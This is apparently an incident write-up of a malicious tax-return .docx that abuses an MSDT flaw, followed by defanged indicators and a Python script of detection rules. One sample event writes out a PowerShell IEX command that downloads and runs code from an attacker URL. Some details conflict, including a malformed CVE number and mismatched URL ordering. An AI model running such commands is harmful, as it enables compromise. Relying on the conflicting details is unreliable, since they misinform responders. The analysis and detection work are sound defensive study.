Initial Email

An email was discovered from comel[@]industry-mass[.]com. The sending domain had been created within the last 15 days.
The email was titled "Tax return 2022" and contained a .docx attachment.

When opened, the file initially looks like a genuine tax return. I have redacted the private information from the screenshot.

Behind the scenes, a macro runs that exploits the CVE-2022-301090 MSDT vulnerability.

Payload Stage 1: MSDT Vulnerability

The macro calls out to hxxps://files[.]catbox[.]moe/sndoli[.]hta, which contains an obfuscated script.

When chained with the CVE-2022-301090 vulnerability, this becomes PowerShell that makes an IEX (Invoke-Expression) request to hxxps://powpowpowffs5[.]blogspot[.]com/atom.xml. This URL immediately 302-redirects to 529f38d0-3744-4286-b484-be860d475d25[.]usrfiles[.]com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42.txt, which serves the stage 2 PowerShell.

Payload Stage 2: Main Powershell

More obfuscation. The initial steps of the script kill several Windows processes. It then saves the payload to C:\ProgramFiles\MEMEMAN\CypherDeptoggraphy.~+~ before decrypting it into a scheduled task creation for the file C:\ProgramData\MEMEMAN\UpdateEscan.js.

Execution

The final payload was downloaded and executed within PowerShell at around 2:17 PM on 22 Mar. The payload successfully copied itself and created additional files in the MEMEMAN directory. Next it cloned itself to the Windows startup directory and created the two scheduled tasks to maintain persistence.
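As an added detection example (not part of the original report), the chain above expressed as process-creation rules run over constructed sample events. The process names, parent relationships (including sdiagnhost.exe as the PowerShell parent) and command lines are assumptions about how such a chain would appear in endpoint telemetry, not observations from this incident.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent image name
    image: str    # image name
    cmdline: str  # full command line

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

def _norm(cmd):
    # Accept defanged log exports ("[.]") as well as live command lines
    return cmd.replace("[.]", ".").lower()

RULES = [
    # Office parent launching the diagnostic tool (MSDT abuse)
    ("office-spawns-msdt", lambda e: e.parent.lower() in OFFICE and e.image.lower() == "msdt.exe"),
    # PowerShell fetching and executing a blogspot atom.xml feed in memory
    ("powershell-iex-blogspot", lambda e: e.image.lower() == "powershell.exe"
        and re.search(r"\b(iex|invoke-expression)\b", _norm(e.cmdline)) is not None
        and "blogspot.com/atom.xml" in _norm(e.cmdline)),
    # Scheduled task pointing at a .js file under ProgramData\MEMEMAN
    ("schtask-mememan-js", lambda e: re.search(r"(/create|register-scheduledtask)", _norm(e.cmdline)) is not None
        and re.search(r'programdata\\mememan\\[^\s"]+\.js', _norm(e.cmdline)) is not None),
    # Script host running a .js dropped into a Startup folder
    ("startup-folder-js", lambda e: e.image.lower() in {"wscript.exe", "cscript.exe"}
        and re.search(r'\\startup\\[^\s"]+\.js', _norm(e.cmdline)) is not None),
]

def evaluate(events):
    """Return (rule_name, image) for every event that matches a rule, in event order."""
    return [(name, e.image) for e in events for name, pred in RULES if pred(e)]

# Constructed sample events modelled on the chain above (not real telemetry)
SAMPLE_EVENTS = [
    ProcEvent("WINWORD.EXE", "msdt.exe", "msdt.exe ms-msdt:/id PCWDiagnostic"),
    ProcEvent("sdiagnhost.exe", "powershell.exe",
              "powershell -w hidden IEX (New-Object Net.WebClient).DownloadString("
              "'hxxps://powpowpowffs5[.]blogspot[.]com/atom[.]xml')"),
    ProcEvent("powershell.exe", "schtasks.exe",
              'schtasks /create /tn Update /tr "wscript C:\\ProgramData\\MEMEMAN\\UpdateEscan.js"'),
    ProcEvent("explorer.exe", "wscript.exe",
              'wscript.exe "C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\UpdateEscan.js"'),
    ProcEvent("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\a\\tax.txt"),
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```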

Antivirus detection of proces

Indicators

Hashes

SHA256 Hash | Description
9e49747bcd7e4eea173a793a0a6c34f3533dc23cf6565d32e4de3a33ad3c8fed | SHA2 of initial .docx file
dac71c21f264036c2c0288340ad6889002a4ed8f4dee74da35b15f7a8a26b473 | SHA2 of the .hta file
a905e397a6bb3374a54fa8ebccf57ff3b8d0f2cd0aca4c9091b0b19fd85d67b3 | SHA2 of the master payload
9c7aefd09d3939a04aa2e36e553881b3ffd88efe8fdda7121a80f37653606b0d | SHA2 of REALENGINEUPDATE.js, a persistence file spawned by the execution of the master payload
6b4fb85973c337fd7cf1b272ab313557a2d256314ab599638fac3ba3d6e8ffb7 | SHA2 of UpdateEscan.js, a persistence file spawned by the execution of the master payload
e7831599adde64042091b5db47032e3a3c3b2f7b8720156900b38f35ca2d8936 | SHA2 of WindowsDEFENDERUPDATE.js, a persistence file spawned by the execution of the master payload
9b57c468f4df5bbedb75d0027348a2dd278e4d168b83a6e74c777d6737de0606 | SHA2 of CypherDeptography.~_~, a persistence file spawned by the execution of the master payload

URLs

URL | Description
urlcallinghta6[.]blogspot[.]com/atom[.]xml | 1st URL request from .docx file
files[.]catbox[.]moe/sndoli[.]hta | 2nd URL, the result of a 302 redirect from the 1st URL
powpowpowffs5[.]blogspot[.]com/atom[.]xml | 3rd URL, contacted from the decoded PowerShell code in sndoli.hta
529f38d0-3744-4286-b484-be860d475d25[.]usrfiles[.]com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42[.]txt | 4th URL, the result of a 302 redirect from the 3rd URL
bakc2000[.]blogspot[.]com/atom[.]xml | URL used by one of the files for persistence, re
backuphotelall[.]blogspot[.]com/atom[.]xml | URL used by one of the files for persistence

Other Resources